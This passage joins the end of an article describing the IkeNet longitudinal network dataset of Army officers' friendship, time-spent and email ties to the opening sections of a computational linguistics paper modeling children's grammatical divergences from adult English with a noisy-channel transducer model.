server (Ring et al., 2008). The IkeNet stud- ies conducted at West Point have demon- strated findings that favor a centralized da- ta collection method over a client-side method (McCulloh and Ring, 2008). Addi- tionally, research has been conducted on how to unobtrusively collect these net- works to reduce respondent burden (McCulloh and Ring, 2008). The source and time of commission was also collected from the ORB. Nine of- ficers to include the two women were graduates of the U.S. Military Academy. The Coast Guard officer was a graduate of the Coast Guard Academy. Eight officers were commissioned through the Reserve Officer Training Corps (ROTC) and the remaining three were commissioned through Officer Candidate School (OCS). The military tracks officer promotions and career management by year groups. There- fore, each officer’s year group was also recorded. One officer was commissioned in 2000, 11 in 2001, seven in 2002, one in 2003, and the Coast Guard officer was commissioned in 2005. Another important attribute for so- cial interaction may be competence or ex- perience. The undergraduate grade point average (GPA) was collected for each of- ficer from his or her application to the graduate program. The GPA ranged from 2.3 to 4.0 with an average GPA of 3.05 and a standard deviation of 0.51. For experi- ence, the number of months an officer spent in command was recorded from their ORB. Command is the “key developmental job” (KD) for a captain and is an experien- tial requirement that an officer must com- plete prior to being admitted into the ELDP program. The only exception is for the Coast Guard officer who must meet different career milestones respective to his military branch of service. The maxi- mum time any officer spent in command was 32 months and the minimum time was 13 months. The average was 23.2 with a standard deviation of 6.1. Each week the officers completed two surveys: friendship and time spent to- gether. There was a 97% response rate among participants. With one out of 22 of- ficers choosing not to participate, the over- all response rate was 92%. In the cases of non-response, the dyadic rating between the preceding and proceeding weeks did not change, so it was simple to interpolate the missing data. Unfortunately, there was no indicator coded in the data for where this occurred. The missing data were ran- dom and believed to be due to oversight. Given that the omission was not discov- ered for about a week and that the ratings for those omissions did not change, there was no attempt to go back to respondents to correct their response. The friendship survey question asked respondents, “Please rate how well you like the other members of your ELDP cohort according to the following scale:” The scale was a seven-point Likert scale as follows: Connections IkeNet: Email and Friendship Evolution 92 | Volume 37 | Issues 1&2 | insna.org Coded Rating (this is what was shown to respondents) 1 “I strongly dislike this person” 2 “I do not care for this person” 3 “I am neutral toward this person” 4 “I like this person” 5 “This person is one of my better friends at this duty station” 6 “This person is one of my better friends overall” 7 “I consider this person one of my closest friends” The time spent together survey question asked respondents, “Please rate the time you spend with the other members of your ELDP cohort according to the fol- lowing scale:” The scale was a seven-point Likert scale as follows: Coded Rating (this is what was shown to respondents) 1 “I avoid this person” 2 “I associate with this person only for official business at work” 3 “I socialize with this person at work” 4 “I occasionally (monthly) get together with this person outside of work” 5 “I regularly (weekly) get together with this person outside of work” 6 “I regularly (weekly) spend time with this person at their/my home” 7 “I go on pass/leave [vacation] with this person” This project collected a rich group of networks surrounding 21 mid-career Army officers. Three networks were col- lected from the participants: friendship, email and the time spent together. The friendship and time spent together were collected through the use of questionnaires on a weekly basis. The email network was collected at the server level and only col- lected the header information of emails (Ring et al., 2008). 3. Data Files and Formats The data are provided as flat comma sepa- rated value files. The file “Attributes.csv” provides the attribute data. There are 34 columns in this file, corresponding to dif- ferent attributes and described by the table below. Column Attribute Description A long tour Number of overseas assignments the officer has had that exceed one year B short tour Number of overseas assignments the officer has had that are one year or less C commands Number of command assignments the officer has had D birthplace Officer’s state of birth E branch Two letter designation of the officers career field F Cbt Tour Number of combat deployments completed G Kids Number of children the officer lists as dependents H CmdMos Number of months spent in command assignments I comm Source of commission: United States Military Academy (US- MA), Reserve Officer Training Corps (ROTC), or Officer Candi- date School (OCS) J followon Follow-on assignment after officer finishes program IkeNet: Email and Friendship Evolution Connections insna.org | Issues 1&2 | Volume 37 | 93 Column Attribute Description K GPA Undergraduate GPA on program application L GRE1 Verbal score on graduate record exam from application M GRE2 Math score on graduate record exam from application N height Height, in inches O HOR State listed as home of record P lang1 Secondary language after English Q lang2 Tertiary language after English R marital Marital status: single, married, or divorced S OPNTour Number of operational deployments, not classified as combat T Race Caucasian (C), Black (B), and Asian (A) U Religion Religion as reported in personnel file V Rest Tour Unknown – Included in personnel file W sex Sex X skill1 Additional skill identifier to denote certain skills used in assign- ment decisions, such as paratrooper or ranger. Y skill2 As above Z skill3 As above AA skill4 As above AB skill5 As above AC spousebirth Spouse’s location of birth AD state State of residence on record for tax purposes AE Undergrad Major Academic major studied in undergraduate program AF Undergrad School Name of the undergraduate academic institution AG Weight Officer’s weight in pounds AH YG Officer’s year group, usually the year they commissioned The email network data is con- tained in files “email01.csv”, “email02.csv”, …, “email20.csv” corre- sponding to weeks one through 20. Each csv contains an adjacency matrix, where the elements of the matrix represent the number of email messages sent from the row element to the column element. The ordering of the rows and columns are con- sistent with the ordering of attributes in the “Attributes.csv” file and with other adja- cency matrices included. The friendship network data is con- tained in files “like01.csv”, “like02.csv”, …, “like20.csv” corresponding to weeks one through 20. Each csv contains an adja- cency matrix, where the elements of the matrix represent the friendship rating that the row element assigns to each column el- ement. The rating follows a seven-point Likert scale. Subjects do not rate them- selves, so “0” represents an N/A value. The ordering of rows and columns are con- sistent with the ordering of attributes in the “Attributes.csv” file and with other adja- cency matrices included. The time spent together network data is contained in files “time01.csv”, “time02.csv”, …, “time20.csv” corre- sponding to weeks one through 20. Each csv contains an adjacency matrix, where the elements of the matrix represent the friendship rating that the row element as- signs to each column element. The rating follows a seven-point Likert scale. Sub- jects do not rate themselves, so “0” repre- sents an N/A value. The ordering of rows and columns are consistent with the order- ing of attributes in the “Attributes.csv” file and with other adjacency matrices includ- ed. Connections IkeNet: Email and Friendship Evolution 94 | Volume 37 | Issues 1&2 | insna.org 4. Data Details Response Rate 100% for email networks, collected at the central server 92% for self-reported survey networks 100% for attribute data, collected from personnel files Non-Respondent Bias None. There was no dyadic change from the data collected in the pre- ceding and following time periods for the few cases of missing data, allowing easy interpolation of data Theoretical Grouping N/A Publication Using These Data None to date Data Context Friendship formation among a group of mid-career military officers in a one-year graduate school program Respondents Mid-career military officers in the Eisenhower Leadership Develop- ment Program of the US Army and Columbia University Longitudinal The first 14 weeks of the program. Temporality Multiple ties are recorded between actors on a weekly basis. Assign- ment cycles typically involved major assignments due every other week. Analytical or Pedagogical Utility  Longitudinal network data with 14 time periods  Multi-level networks with three relations: self-reported friend- ship, self-reported time spent together, email  Network evolution, capturing data as the actors meet for the first time  Node and edge covariates Known Issues References McCulloh, I., Armstrong, H. & Johnson, A.N. (2013). Social Network Analysis With Applications. Hobo- ken, NJ: Wiley. McCulloh, I. & Ring, B. (2008). Unobtrusive Social Network Data from E-mail. In Proceedings, 26th Army Science Conference. Orlando, FL. Ring, B., Henderson, S., & McCulloh, I. (2008). Gath- ering and Studying Email Traffic to Understand Social Networks. In H.R. Arabnia & R.R. Hashe- mi (Eds.), Proceedings of The 2008 International Conference On Information & Knowledge Engi- neering (pp. 338-343). Las Vegas: CSREA Press. Wasserman, S., & Faust, K. (1994). Social network analysis: Methods and applications (Vol. 8). Cambridge: Cambridge University Press. work_lowlmiflivaeblgbyxkxrbt3nq ---- Transactions of the Association for Computational Linguistics, 1 (2013) 125–138. Action Editor: Sharon Goldwater. Submitted 10/2012; Revised 3/2013; Published 5/2013. c©2013 Association for Computational Linguistics. Modeling Child Divergences from Adult Grammar Sam Sahakian University of Wisconsin-Madison sahakian@cs.wisc.edu Benjamin Snyder University of Wisconsin-Madison bsnyder@cs.wisc.edu Abstract During the course of first language acquisi- tion, children produce linguistic forms that do not conform to adult grammar. In this paper, we introduce a data set and approach for sys- tematically modeling this child-adult grammar divergence. Our corpus consists of child sen- tences with corrected adult forms. We bridge the gap between these forms with a discrim- inatively reranked noisy channel model that translates child sentences into equivalent adult utterances. Our method outperforms MT and ESL baselines, reducing child error by 20%. Our model allows us to chart specific aspects of grammar development in longitudinal stud- ies of children, and investigate the hypothesis that children share a common developmental path in language acquisition. 1 Introduction Since the publication of the Brown Study (1973), the existence of standard stages of development has been an underlying assumption in the study of first language learning. As a child moves towards lan- guage mastery, their language use grows predictably to include more complex syntactic structures, even- tually converging to full adult usage. In the course of this process, children may produce linguistic forms that do not conform to the grammatical standard. From the adult point of view these are language er- rors, a label which implies a faulty production. Con- sidering the work-in-progress nature of a child lan- guage learner, these divergences could also be de- scribed as expressions of the structural differences between child and adult grammar. The predictability of these divergences has been observed by psychol- ogists, linguists and parents (Owens, 2008).1 Our work leverages the differences between child and adult language to make two contributions to- wards the study of language acquisition. First, we provide a corpus of errorful child sentences anno- tated with adult-like rephrasings. This data will al- low researchers to test hypotheses and build models relating the development of child language to adult forms. Our second contribution is a probabilistic model trained on our corpus that predicts a gram- matical rephrasing given an errorful child sentence. The generative assumption of our model is that sentences begin in underlying adult forms, and are then stochastically transformed into observed child utterances. Given an observed child utterance s, we calculate the probability of the corrected adult trans- lation t as P(t|s) ∝ P(s|t)P(t), where P(t) is an adult language model and P(s|t) is a noise model crafted to capture child grammar errors like omission of certain function words and corruptions of tense or declension. The parame- ters of this noise model are estimated using our cor- pus of child and adult-form utterances, using EM to handle unobserved word alignments. We use this generative model to produce n-best lists of candi- date corrections which are then reranked using long range sentence features in a discriminative frame- work (Collins and Roark, 2004). 1For the remainder of this paper we use “error” and “diver- gence” interchangeably. 125 One could argue that our noisy channel model mirrors the cognitive process of child language pro- duction by appealing to the hypothesis that children rapidly learn adult-like grammar but produce errors due to performance factors (Bloom, 1990; Ham- burger and Crain, 1984). That being said, our pri- mary goal in this paper is not cognitive plausibility, but rather the creation of a practical tool to aid in the empirical study of language acquisition. By au- tomatically inferring adult-like forms of child sen- tences, our model can highlight and compare devel- opmental trends of children over time using large quantities of data, while minimizing the need for hu- man annotation. Besides this, our model’s predictive success it- self has theoretical implications. By aggregating training and testing data across children, our model instantiates the Brown hypothesis of a shared de- velopmental path. Even when adequate per-child training data exists, using data only from other chil- dren leads to no degradation in performance, sug- gesting that the learned parameters capture general child language phenomena and not just individual habits. Besides aggregating across children, our model coarsely lumps together all stages of devel- opment, providing a frozen snapshot of child gram- mar. This establishes a baseline for more cognitively plausible and temporally dynamic models. We compare our correction system against two baselines, a phrase-based Machine Translation (MT) system, and a model designed for English Second Language (ESL) error correction. Relative to the best performing baseline, our approach achieves a 30% decrease in word error-rate and a four point increase in BLEU score. We analyze the perfor- mance of our system on various child error cate- gories, highlighting our model’s strengths (correct- ing be drops and morphological overgeneralizations) as well as its weaknesses (correcting pronoun and auxiliary drops). We also assess the learning rate of our model, showing that very little annotation is needed to achieve high performance. Finally, to showcase a potential application, we use our model to chart one aspect of four children’s grammar ac- quisition over time. While generally vindicating the Brown thesis of a common developmental path, the results point to subtleties in variation across individ- uals that merit further investigation. 2 Background and Related Work While child error correction is a novel task, com- putational methods are frequently used to study first language acquisition. The computational study of speech is facilitated by TalkBank (MacWhinney, 2007), a large database of transcribed dialogues in- cluding CHILDES (MacWhinney, 2000), a subsec- tion composed entirely of child conversation data. Computational tools have been developed specif- ically for the large-scale analysis of CHILDES. These tools enable further computational study such as the automatic calculation of the language devel- opment metrics IPSYN (Sagae et al., 2005) and D-Level (Lu, 2009), or the automatic formula- tion of novel language development metrics them- selves (Sahakian and Snyder, 2012). The availability of child language is also key to the design of computational models of language learning (Alishahi, 2010), which can support the plausibility of proposed human strategies for tasks like semantic role labeling (Connor et al., 2008) or word learning (Regier, 2005). To our knowledge this paper is the first work on error correction in the first language learning domain. Previous work has employed a classifier-based approach to iden- tify speech errors indicative of language disorders in children (Morley and Prud’hommeaux, 2012). Automatic correction of second language (L2) writing is a common objective in computer assisted language learning (CALL). These tasks generally target high-frequency error categories including ar- ticle, word-form, and preposition choice. Previous work in CALL error correction includes identify- ing word choice errors in TOEFL essays based on context (Chodorow and Leacock, 2000), correcting errors with a generative lattice and PCFG rerank- ing (Lee and Seneff, 2006), and identifying a broad range of errors in ESL essays by examining linguis- tic features of words in sequence (Gamon, 2011). In a 2011 shared ESL correction task (Dale and Kilgar- riff, 2011), the best performing system (Rozovskaya et al., 2011) corrected preposition, article, punctu- ation and spelling errors by building classifiers for each category. This line of work is grounded in the practical application of automatic error correction as a learning tool for ESL students. Statistical Machine Translation (SMT) has been 126 applied in diverse contexts including grammar cor- rection as well as paraphrasing (Quirk et al., 2004), question answering (Echihabi and Marcu, 2003) and prediction of twitter responses (Ritter et al., 2011). In the realm of error correction, SMT has been ap- plied to identify and correct spelling errors in inter- net search queries (Sun et al., 2010). Within CALL, Park and Levy (2011) took an unsupervised SMT approach to ESL error correction using Weighted Fi- nite State Transducers (FSTs). The work described in this paper is inspired by that of Park and Levy, and in Section 6 we detail differences between our approaches. We also include their model as a base- line. 3 Data To train and evaluate our translation system, we first collected a corpus of 1,000 errorful child-language utterances from the American English portion of the CHILDES database. To encourage diversity in the grammatical divergences captured by our corpus, our data is drawn from a large pool of studies (see bibliography for the full list of citations). In the annotation process, candidate child sen- tences were randomly selected from the pool and classified by hand as either grammatically correct, divergent or unclassifiable (when it was not possi- ble to tell what a child is trying to say). We con- tinued this process until 1,000 divergent sentences were found. Along the way we also encountered 5,197 grammatically correct utterances and 909 that were unclassifiable.2 Because CHILDES includes speech samples from children of diverse age, back- ground and language ability, our corpus does not capture any specific stage of language development. Instead, the corpus represents a general snapshot of a learner who has not yet mastered English as their first language. To provide the grammatically correct counterpart to child data, our errorful sentences were corrected by workers on Amazon’s Mechanical Turk web ser- vice. Given a child utterance and its surrounding conversational context, annotators were instructed to translate the child utterance into adult-like En- glish. We limited eligible workers to native English 2These hand-classified sentences are available online along with our set of errorful sentences. Error Type Child Utterance Insertion I did locked it. Inflection More cookie? Deletion That not how. Lemma Choice I got grain. Overgeneralization I drawed it. Table 1: Examples of error types captured by our model. speakers residing in the US. We also required anno- tators to follow a brief tutorial in which they prac- tice correcting sample utterances according to our guidelines. These guidelines instructed workers to minimally alter sentences to be grammatically con- sistent with a conversation or written letter, without altering underlying meaning. Annotators were eval- uated on a worker-by-worker basis and rejected in the rare case that they ignored our guidelines. Ac- cepted workers were paid 7 cents for correcting each set of 5 sentences. To achieve a consistent judgment, we posted each set of sentences for correction by 7 different annotators. Once multiple reference translations were ob- tained we selected a single best correction by plu- rality, arbitrating ties as necessary. There were sev- eral cases in which corrections obtained by plurality decision did not perfectly follow instructions. These were manually corrected. Both the raw translations provided by individual annotators as well as the cu- rated final adult forms are provided online as part of our data set.3 Resulting pairs of errorful child sen- tences and their adult-like corrections were split into 73% training, 7% development and 20% test data, which we use to build, tune and evaluate our gram- mar correction system. In the final test phase, devel- opment data is included in the training set. 4 Model According to our generative model, adult-like utter- ances are formed and then transformed by a noisy channel to become child sentences. The structure of our noise model is tailored to match our observa- tions of common child errors. These include: func- tion word insertions, function word deletions, swaps of function words and, inflectional changes to con- tent words. Examples of each error type are given 3Data is available at http://pages.cs.wisc.edu/~bsnyder 127 in Table 1. Our model does not allow reorderings, and can thus be described in terms of word-by-word stochastic transformations to the adult sentence. We use 10 word classes to parameterize our model: pronouns, negators, wh-words, conjunc- tions, prepositions, determiners, modal verbs, “be” verbs, other auxiliary verbs, and lexical content words. The list of words in each class is provided as part of our data set. For each input adult word w, the model generates output word w′ as a hierarchi- cal series of draws from multinomial distributions, conditioned on the original word w and its class c. All distributions receive an asymmetric Dirichlet prior which favors retention of the adult word. With the sole exception of word insertions, the distribu- tions are parameterized and learned during train- ing. Our model consists of 217 multinomial distri- butions, with 6,718 free parameters. The precise form and parameterization of our model were handcrafted for performance on the de- velopment data, using trial and error. We also con- sidered more fine-grained model forms (i.e. one parameter for each non-lexical input-output word pair), as well as coarser parameterizations (i.e. a single shared parameter denoting any inflection change). The model we describe here seemed to achieve the best balance of specificity and general- ization. We now present pseudocode describing the noise model’s operation upon processing each word, along with a brief description of each step. Action selection (lines 3-7): On reading an input word, an action category a is selected from a prob- ability distribution conditioned on the input word’s class. Our model allows up to two function word insertions or deletions in a row before a swap is re- quired. Lexical content words may not be deleted or inserted, only swapped. Insert and Delete (lines 8-15): The deletion case requires no decision after action selection. In the insertion case, the class of the inserted word, c′, is selected conditioned on cPREV , the class of the previous adult word. The precise identity of the inserted word is then drawn from a uniform distribution over words in class c′. It is important to note that in the insertion case, the input word at a given iteration will be re-processed at the next iteration (lines 33-35). insdel ← 0 for word w with class c, inflection f, lemma ` do 3: if insdel = 2 then a ← swap else 6: a ∼{insert, delete, swap} | c end if if a = delete then 9: insdel++ c′ ← � w′ ← � 12: else if a = insert then insdel++ c′ ∼ classes | cPREV , insert 15: w′ ∼ words in c′ | insert else insdel ← 0 18: c′ ← c if c ∈ uninflected-classes then w′ ∼ words in c | w, swap 21: else if c = aux then `′ ∼ aux-lemmas | `, swap f ′ ∼ inflections | f, swap 24: w′ ← COMBINE(`′,f ′) else f ′ ∼ inflections | f, swap 27: w′ ← COMBINE(`,f ′) end if end if 30: if w′ ∈ irregular then w′ ∼ OVERGEN(w′)∪{w′} end if 33: if a = insert then goto line 3 end if 36: end for Swap (lines 16 - 29): In the swap case, a word of given class is substituted for another word in the same class. Depending on the source word’s class, swaps are handled in slightly different ways. If the word is a modal, conjunction, determiner, preposi- tion, “wh-” word or negative, it is considered “unin- 128 flected.” In these cases, a new word w′ is selected from all words in class c, conditioned on the source word w. If w is an auxiliary verb, the swap procedure con- sists of two parallel steps. A lemma is selected from possible auxiliary lemmas, conditioned on the lemma of the source word.4 In the second step, an output inflection type is selected from a distribution conditioned on the source word’s inflection. The precise output word is fully specified by the choice of lemma and conjugation. If w is not in either of the above two categories, it is a lexical word, and our model only allows changes in conjugation or declension. If the source word is a noun it may swap to singular or plural form con- ditioned on the source form. If the word is a verb, it may swap to any conjugated or non-finite form, again conditioned on the source form. Lexical words that are not marked by CELEX (Baayen et al., 1996) as nouns or verbs may only swap to the exact same word. Overgeneralization (lines 30-32): Finally, the noisy channel considers the possibility of produc- ing overgeneralized word forms (like “maked” and “childs”) in place of their correct irregular forms. The OVERGEN function produces the incorrect over- generalized form. We draw from a distribution which chooses between this form and the correct original word. Our model maintains separate dis- tributions for nouns (overgeneralized plurals) and verbs (overgeneralized past tense). 5 Implementation In this section, we describe steps necessary to build, train and test our error correction model. Weighted Finite State Transducers (FSTs) used in our model are constructed with OpenFst (Allauzen et al., 2007). 5.1 Sentence FSTs These FSTs provide the basis for our translation pro- cess. We represent sentences by building a simple linear chain FST, progressing from node to node with each arc accepting and yielding one word in the sentence. All arcs are weighted with probability one. 4Auxiliary lemmas include have, do, go, will, and get. 5.2 Noise FST The noise model provides a conditional probability over child sentences given an adult sentence. We en- code this model as a FST with several states, allow- ing us to track the number of consecutive insertions or deletions. We allow only two of these operations in a row, thereby constraining the length of the out- put sentence. This constraint results in three states (insdel = 0, insdel = 1, insdel = 2), along with an end state. In our training data, only 2 sentence pairs cannot be described by the noise model due to this constraint. Each arc in the FST has an � or adult-language word as input symbol, and a possibly errorful child- language word or � as output symbol. Each arc weight is the probability of transducing the input word to the output word, determined according to the parameterized distributions described in Sec- tion 4. Arcs corresponding to insertions or dele- tions lead to a new state (insdel++) and are not al- lowed from state insdel = 2. Substitution arcs all lead back to state insdel = 0. Word class infor- mation is given by a set of word lists for each non- lexical class.5 Inflectional information is derived from CELEX. 5.3 Language Model FST The language model provides a prior distribution over adult form sentences. We build a a trigram language model FST with Kneser-Ney smoothing using OpenGRM (Roark et al., 2012). The lan- guage model is trained on all parent speech in the CHILDES studies from which our errorful sentences are drawn. In the language model FST, the input and output words of each arc are identical. Arcs are weighted with the probability of the n-gram beginning with some prefix associated with the source node, and ending with the arc’s input/output word. In this setup, the probability of a string is the total weight of the path accepting and emitting that string. 5.4 Training As detailed in Section 4, our noise model consists of a series of multinomial distributions which govern 5Word lists are included for reference with our dataset. 129 0 1 that:that 2 is:<eps> 3him:him his:him him:him his:him 4 hat:hat hats:hat 5 .:. Figure 1: A simplified decoding FST for the child sentence “That him hat.” In an actual decoding FST many more transduction arcs exist, including those translating “that” and “him” to any determiner and pronoun, respectively, and affording opportunities for many more deletions and insertions. Input and output strings given by FST paths correspond to possible adult-to-child translations. the transformation from adult word to child word, al- lowing limited insertions and deletions. We estimate parameters θ for these distributions that maximize their posterior probability given the observed train- ing sentences {(s,t)}. Since our language model P(t) does not depend on on the noise model param- eters, this objective is equivalent to jointly maximiz- ing the prior and the conditional likelihoods of child sentences given adult sentences: argmax θ P(θ) ∏ P(s|t,θ) To represent all possible derivations of each child sentence s from its adult translation t, we compose the sentence FSTs with the noise model, obtaining: FSTtrain = FSTt ◦FSTnoise ◦FSTs Each path through FSTtrain corresponds to a sin- gle derivation d, with path weight P(s,d|t,θ). By summing all path weights, we obtain P(s|t,θ). We use a MAP-EM algorithm to maximize our objective while summing over all possible derivations. Our training scheme relies on FSTs weighted in the V-expectation semiring (Eisner, 2001), imple- mented using code from fstrain (Dreyer et al., 2008). Besides carrying probabilities, arc weights are sup- plemented with a vector to indicate parameter counts involved in the arc traversal. The V-expectation semiring is designed so that the total arc weight of all paths through the FST yields both the probabil- ity P(s|t,θ), along with expected parameter counts. Our EM algorithm proceeds as follows: We start by initializing all parameters to uniform distribu- tions with random noise. We then weight the arcs in FSTnoise accordingly. For each sentence pair (s,t), we build FSTtrain by composition with our noise model, as described in the previous paragraph. We then compute the total arc weight of all paths through FSTtrain by relabeling all input and output symbols to � and then reducing FSTtrain to a single state using epsilon removal (Mohri, 2008). The stop- ping weight of this single state is the sum of all paths through the original FST, yielding the probability P(s|t,θ), along with expected parameter counts ac- cording to our current distributions. We then reesti- mate θ using the expected counts plus pseudo-counts given by priors, and repeat this process until conver- gence. Besides smoothing our estimated distributions, the pseudo-counts given by our asymmetric Dirich- let priors favor multinomials that retain the adult word form (swaps, identical lemmas, and identical inflections). Concretely, we use pseudo-counts of .5 for these favored outcomes, and pseudo-counts of .01 for all others.6 In practice, 109 of the child sentences in our data set cannot be translated into a corresponding adult version using our model. This is due to a range of rare phenomena like rephrasing, lexical word swaps and word-order errors. In these cases, the composed FST has no valid paths from start to finish and the sentence is removed from training. We run EM for 100 iterations, at which time the log likelihood of all sentences generally converges to within .01. 5.5 Decoding After training our noise model, we apply the sys- tem to translate divergent child language to adult- like speech. As in training, the noise FST is com- posed with the FST for each child sentence s. In 6corresponding to Dirichlet hyperparameters of 1.5 and 1.01 respectively. 130 place of the adult sentence, the language model FST is used, yielding: FSTdecode = FSTlm ◦FSTnoise ◦FSTs Each path through FSTdecode corresponds to an adult translation and derivation (t,d), with path weight P(s,d|t,θ)P(t). Thus, the highest-weight path corresponds to the most likely translation and derivation pair: argmax t,d P(t,d|s,θ) We use a dynamic program to find the n highest- weight paths with distinct adult sentences t. This can be viewed as finding the n most likely adult trans- lations, using a Viterbi approximation P(t|s,θ) = argmaxd P(t,d|s,θ). In our experiments we set n = 50. A simplified FSTdecode example is shown in Figure 1. 5.6 Discriminative Reranking To more flexibly capture long range syntactic fea- tures, we embed our noisy channel model in a dis- criminative reranking procedure. For each child sen- tence s, we take the n-best candidate translations t1, . . . , tn from the underlying generative model, as described in the previous section. We then map each candidate translation ti to a d-dimensional feature vector f(s,ti). The reranking model then uses a d- dimensional weight vector λ to predict the candidate translation with highest linear score: t∗ = argmax ti λ ·f(s,ti) To simulate test conditions, we train the weight vec- tor on n-best lists from 8-fold cross-validation over training data, using the averaged perceptron rerank- ing algorithm (Collins and Roark, 2004). Since the n-best list might not include the exact gold-standard correction, a target correction which maximizes our evaluation metric is chosen from the list. The n-best list is non-linearly separable, so perceptron training iterates for 1000 rounds, when it is terminated with- out converging. Our feature function f(s,ti) yields nine boolean and real-valued features derived from (i) the FST that generates child sentence s from candidate adult- form ti, and (ii) the POS sequence and dependency parse of candidate ti obtained with the Stanford Parser (de Marneffe et al., 2006). Features were se- lected based on their performance in reranking held- out development data from the training set. Rerank- ing features are given below: Generative Model Probabilities: We first include the joint probability of the child sentence s and can- didate translation ti, given by the generative model: Plm(ti)Pnoise(s|ti). We also isolate the candidate translation’s language model and noise model prob- abilities as features. Since both of these proba- bilities naturally favor shorter sentences, we scale them to sentence length, yielding n √ Plm(ti) and n √ Pnoise(s|ti) respectively. By not scaling the joint probability, we allow the reranker to learn its own bias towards longer or shorter corrected sentences. Contains Noun Subject, Accusative Noun Sub- ject: The first boolean feature indicates whether the dependency parse of candidate translation ti con- tains a “nsubj” relation. The second indicates if a “nsubj” relation exists where the dependent is an ac- cusative pronoun (e.g. “Him ate the cookie”). These features and the one following have previously been used in classifier based error detection (Morley and Prud’hommeaux, 2012). Contains Finite Verb: This boolean feature is true if the POS tags of ti include a finite verb. This feature differentiates structures like “I am going” from “I going.” Question Template Features: We define tem- plates for wh- and yes-no questions. A sentence fits the wh- question template if it begins with a wh- word, followed by an auxiliary or copula verb (e.g. “Who did...”). A sentence fits the yes-no template when it begins with an auxiliary or copula verb, then a noun subject followed by a verb or adjective (e.g. “Are you going...”). We include one boolean feature for each of these templates indicating when a tem- plate match is inappropriate, when the original child utterance terminates in a period instead of a question mark. In addition to the two features for inappropri- ate template matches, we have a single feature that signals appropriate matches of either question tem- plate — when the original child utterance terminates in a question mark. 131 Child Utterance Human Correction Machine Correction I am not put in my mouth. I am not putting it in my mouth. I am not going to put it in my mouth. This one have water? Does this one have water? This one has water? Want to read the book. I want to read the book. You want to read the book. Why you going to get two? Why are you going to get two? Why are you going to have two? You very sticky. You are very sticky. You are very sticky. He no like. He does not like it. He does not like that. Yeah it looks a lady. Yeah it looks like a lady Yeah it looks like a lady. Eleanor come too. Eleanor came too. Eleanor come too. Desk in here. The desk is in here Desk is in here. Why he’s doc? Why is he called doc? He’s up doc? Table 2: Randomly selected test output generated by our complete error correction model, along with corresponding child utterances and human corrections. 6 Experiments and Analysis Baselines We compare our system’s performance with two pre-existing baselines. The first is a stan- dard phrase-based machine translation system using MOSES (Koehn et al., 2007) with GIZA++ (Och and Ney, 2003) word alignments. We hold out 9% of the training data for tuning using the MERT algo- rithm with BLEU objective (Och, 2003). The second baseline is our implementation of the ESL error correction system described by Park and Levy (2011). Like our system, this baseline trains FST noise models using EM in the V-expectation semiring. Our noise model is crafted specifically for the child language domain, and so differs from Park and Levy’s in several ways: First, we capture a wider range of word-swaps, with richer parameteri- zation allowing many more translation options. As a result, our model has 6,718 parameters, many more than the ESL model’s 187. These parameters corre- spond to learned probability distributions, whereas in the ESL model many of the distributions are fixed as uniform. We also capture a larger class of errors, including deletions, change of auxiliary lemma, and inflectional overgeneralizations. Finally, we use a discriminative reranking step to model long-range syntactic dependencies. Although the ESL model is originally geared towards fully unsupervised train- ing, we train this baseline in the same supervised framework as our model. Evaluation and Performance We train all models on 80% of our child-adult sentence pairs and test on the remaining 20%. For illustration, selected output from our model is shown in Table 2. Predictions are evaluated with BLEU score (Pap- ineni et al., 2002) and Word Error Rate (WER), de- fined as the minimum string edit distance (in words) between reference and predicted translations, di- vided by length of the reference. As a control, we compare all results against scores for the uncor- rected child sentences themselves. As reported in Table 3, our model achieves the best scores for both metrics. BLEU score increases from 50 for child sentences to 62, while WER is reduced from .271 to .224. Interestingly, MOSES achieves a BLEU score of 58 — still four points below our model — but ac- tually increases WER to .449. For both metrics, the ESL system increases error. This is not surprising given that its intended application is in an entirely different domain. Error Analysis We measured the performance of our model over the six most common categories of child divergence, including deletions of various function words and overgeneralizations of past tense forms (e.g. “maked” for “made”). We first iden- tified model parameters associated with each cate- gory, and then counted the number of correct and in- correct parameter firings on the test sentences. As Table 4 indicates, our model performs reasonably well on “be” verb deletions, preposition deletions, and overgeneralizations, but has difficulty correcting pronoun and auxiliary deletions. In general, hypothesizing dropped words burdens the noise model by adding additional draws from multinomial distributions to the derivation. To pre- 132 BLEU WER WER reranking 62.12 .224 BLEU reranking 60.86 .231 No reranking 60.37 .233 Moses 58.29 .449 ESL 40.76 .318 Child Sentences 49.55 .271 Table 3: WER and BLEU scores. Our system’s perfor- mance using various reranking schemes (BLEU objec- tive, WER objective and none) is contrasted with Moses MT and ESL error correction baselines, as well as un- corrected test sentences. Best performance under each metric is shown in bold. dict a deletion, either the language model or the reranker must strongly prefer including the omit- ted word. A syntax-based noise model may achieve better performance in detecting and correcting child word drops. While our model parameterization and perfor- mance rely on the largely constrained nature of child language errors, we observe some instances in which it is overly restrictive. For 10% of utterances in our corpus, it is impossible to recover the exact gold-standard adult sentence. These sentences fea- ture errors like reordering or lexical lemma swaps — for example “I talk Mexican” for “I speak Spanish.” While our model may correct other errors in these sentences, a perfect correction is unattainable. Sometimes, our model produces appropriate forms which by happenstance do not conform to the annotators’ decision. For example, in the second row of Table 2, the model corrects “This one have water?” to “This one has water?”, instead of the more verbose correction chosen by the annotators (“Does this one have water?”). Similarly, our model sometimes produces corrections which seem appro- priate in isolation, but do not preserve the meaning implied by the larger conversational context. For ex- ample, in row three of Table 2, the sentence “Want to read the book.” is recognized both by our hu- man annotators and the system as requiring a pro- noun subject. Unlike the annotators, however, the model has no knowledge of conversational context, so it chooses the highest probability pronoun — in this case “you” — instead of the contextually correct “I.” Error Type Count F1 P R Be Deletions 63 .84 .84 .84 Pronoun Deletions 30 .15 .38 .1 Aux. Deletions 30 .21 .44 .13 Prep. Deletions 26 .65 .82 .54 Det. Deletions 22 .48 .73 .36 Overgen. Past 7 .92 1.0 .86 Table 4: Frequency of the six most common error types in test data, along with our model’s corresponding F- measure, precision and recall. All counts are ±.12 at p = .05 under a binomial normal approximation inter- val. 0% 10% 20% 30% 40% 50% 60% 70% 80% 90% 100% 40 45 50 55 60 65 .20 .22 .24 .26 .28 .30 .32 % Train Data B L E U W E R Figure 2: Performance with limited training data. WER is drawn as the dashed line, and BLEU as the solid line. Learning Curves In Figure 2, we see that the learning curves for our model initially rise sharply, then remain relatively flat. Using only 10% of our training data (80 sentences), we increase BLEU from 44 (using just the language model) to almost 61. We only reach our reported BLEU score of 62 when adding the final 20% of training data. This result emphasizes the specificity of our parameteri- zation. Because our model is so tailored to the child- language scenario, only a few examples of each er- ror type are needed to find good parameter values. We suspect that more annotated data would lead to a continued but slow increase in performance. Training and Testing across Children We use our system to investigate the hypothesis that lan- guage acquisition follows a similar path across chil- dren (Brown, 